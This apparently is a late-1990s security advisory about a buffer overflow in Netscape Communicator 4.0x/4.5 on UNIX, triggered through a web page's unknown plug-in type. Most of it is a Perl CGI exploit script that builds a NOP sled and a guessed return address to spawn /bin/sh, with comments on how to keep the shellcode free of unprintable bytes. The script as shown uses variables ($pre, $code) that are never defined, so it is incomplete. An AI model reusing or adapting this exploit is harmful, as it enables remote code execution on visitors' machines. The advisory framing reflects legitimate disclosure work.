Netscape Communicator (4.0x and 4.5) on a UNIX machine was found to be vulnerable to a MIME attack, making it possible to crash the client and possible gain root access to the machine.
Netscape Communicator can be caused to crash and execute arbitrary code by causing an overflow in the dialog message shown when Netscape Communicator is faced with an unknown plug-in type. A malicious web site administrator can cause the remote Netscape program execute arbitrary code by placing special codes inside a HTML page.
A code that will cause Netscape on a UNIX to turn into a "/bin/sh" program is included:
#!/usr/bin/perl
#
# buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19
# This is very tricky business. Netscape maps unprintable characters
# (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine
# code must be free of these characters. This makes it impossible
# to call int 0x80, so I put int 0x40 there and wrote code to
# shift those bytes left before it gets called. Also null characters
# can't be used because of C string conventions.
# the first paragraph of the following turns the int 0x40 in the second
# paragraph into int 0x80. the second paragraph nullifies the SIGALRM
# handler.
my $nop = "\x90";
# this actually gets mapped onto 0x3f, but it doesn't seem
# to matter
my $address = "\x10\xdb\xff\xbf";
# wild guess, intended to be somewhere
# in the chunk of nops. works on every
# linux box i've tried it on so far.
my $len = 0x1000 - length($pre);
my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code;
# the first $address is in the string replaces another
# pointer in the same function which gets dereferenced
# after the buffer is overflowed. there must be a valid
# address there or it will segfault early.
